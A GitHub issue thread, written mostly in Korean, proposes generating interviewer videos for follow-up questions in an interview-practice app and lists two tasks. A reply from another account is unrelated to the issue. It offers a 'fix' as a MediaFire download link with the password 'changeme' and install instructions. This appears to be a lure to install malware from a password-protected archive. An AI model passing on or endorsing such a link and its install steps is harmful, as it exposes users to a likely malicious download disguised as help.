### ISSUE TITLE
[follow] 꼬리물기 질문에 대한 면접관 영상 생성

### ISSUE THREAD

**Issue by duri22** [InterviewExplorer/InterviewExplorer_front#11]
## 🌱 문제 제기
현재 면접관 영상 생성을 기본 질문에 대해서만 생성하고 있을 가능성

## 🌱 기능 내용
꼬리물기 질문에 대해서도 영상을 생성한다.

## 🌱 할 일
- [ ] 꼬리물기 질문이 생성되면 그 질문을 백엔드로 보낸다.
- [ ] 생성한 영상의 url을 interviewer 에 추가

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
